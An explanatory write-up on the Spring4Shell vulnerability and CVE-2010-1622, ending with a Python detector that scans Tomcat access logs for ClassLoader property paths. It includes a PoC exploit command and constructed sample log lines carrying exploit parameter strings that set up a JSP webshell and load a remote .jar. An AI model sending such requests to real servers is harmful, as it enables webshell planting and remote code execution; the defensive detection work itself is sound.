To understand Spring4Shell (CVE-2022-22965), it helps to first understand CVE-2010-1622. Spring MVC (Model-View-Controller) is the part of the Spring Framework that makes it easy to build web applications following the MVC design pattern. One of its features is data binding: when a request arrives, Spring instantiates an object of the handler method's parameter class and populates its properties from the request parameters, resolving nested property paths such as user.address.city. Every Java object exposes a getClass() getter, so a parameter name beginning with class.classLoader. walked out of the model object and into the ClassLoader that loaded it. In CVE-2010-1622 an attacker used this to reconfigure the ClassLoader so that it loaded attacker-supplied code, resulting in remote code execution.
Spring4Shell works along similar lines, bypassing the mitigation that was added to patch CVE-2010-1622. That fix stopped the binder from following the classLoader property of a Class object, but on JDK 9 and later the same ClassLoader is reachable through the new path class.module.classLoader, which the filter did not cover. The majority of the public exploits for Spring4Shell use this to make the application write a malicious .jsp file into the webserver. A .jsp file is effectively Java source embedded in a page which Tomcat compiles and executes on request, much like a PHP webserver executes files with a .php extension. Requesting the written file then runs the webshell and gives remote command execution on the target.
The first step is to identify the endpoint that is vulnerable to Spring4Shell, which means one whose handler binds request parameters into a plain Java object. A public PoC script makes it easy to test an endpoint with the following command:

python exploit.py --url "http://localhost:8080/helloworld/greeting" --dir=webapps/greeting

Note the --dir flag: it is optional and only needed when the .jsp payload must be written to a specific directory, here the target application's folder under Tomcat's webapps directory.
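Both CVEs are reached through the same kind of parameter name, class.classLoader for CVE-2010-1622 and class.module.classLoader for Spring4Shell, so the request side of the attack is easy to spot in logs. The following detector is an added example written for this page; it is not part of the original writeup or of the PoC script. It parses Tomcat "common" format access log lines, pulls the query string apart exactly as the servlet container would (one round of percent-decoding) and flags parameter names that traverse into the ClassLoader. The log lines are constructed for the example, reuse the /helloworld/greeting endpoint from the PoC command above, and model their parameter names on the published exploit pattern.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Nested property paths through which both CVEs escape the bound model object:
# CVE-2010-1622 used class.classLoader; CVE-2022-22965 (Spring4Shell) reaches
# the same ClassLoader on JDK 9+ through class.module.classLoader. Matching is
# case-insensitive because the binder also accepts "Class.", which is why the
# published workaround blocks class.*, Class.*, *.class.* and *.Class.*.
CLASSLOADER_PATH = re.compile(r"(^|\.)class\.(module\.)?classloader(\.|$)", re.IGNORECASE)


def suspicious_params(encoded_form: str) -> list:
    """Return the parameter names in a query string or form body that traverse
    into the ClassLoader. parse_qsl percent-decodes once, as the servlet
    container does, so class%2Emodule%2EclassLoader is caught as well."""
    return [name for name, _ in parse_qsl(encoded_form, keep_blank_values=True)
            if CLASSLOADER_PATH.search(name)]


# Tomcat "common" access log format: %h %l %u %t "%r" %s %b  (assumed log format)
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)


def scan_access_log(lines) -> list:
    """Flag requests whose query string carries a ClassLoader property path."""
    hits = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue  # not a parseable access-log entry; skip rather than crash
        target = urlsplit(m["target"])
        names = suspicious_params(target.query)
        if names:
            hits.append({"ip": m["ip"], "method": m["method"], "path": target.path,
                         "status": int(m["status"]), "params": names})
    return hits


# Constructed sample lines (not real traffic). The endpoint is the one from the
# PoC command; parameter names follow the published exploit pattern, including
# a mixed-case and percent-encoded variant and the 2010-style class.classLoader.
SAMPLE_LOG = [
    '10.0.0.7 - - [31/Mar/2022:10:15:02 +0000] "GET /helloworld/greeting?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [31/Mar/2022:10:15:07 +0000] "GET /helloworld/greeting?'
    'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 200 512',
    '10.0.0.9 - - [31/Mar/2022:10:15:08 +0000] "GET /helloworld/greeting?'
    'Class%2Emodule%2EclassLoader.resources.context.parent.pipeline.first.prefix=shell HTTP/1.1" 200 512',
    '10.0.0.12 - - [31/Mar/2022:10:16:11 +0000] "GET /helloworld/greeting?'
    'class.classLoader.URLs%5B0%5D=http://10.0.0.12/x.jar HTTP/1.1" 400 -',
    '10.0.0.7 - - [31/Mar/2022:10:16:20 +0000] "POST /helloworld/greeting HTTP/1.1" 200 512',
    'garbage line that is not an access log entry',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The scan only sees query strings: if the exploit sends its parameters in a POST body, a plain access log records just the path (as in the POST line above), so the same suspicious_params() check has to be run on a request or WAF log that captures bodies. A 400 response, as on the class.classLoader line, usually means the binder rejected the path and is a sign the 2010 fix is in place, while a 200 on a class.module.classLoader request deserves immediate follow-up.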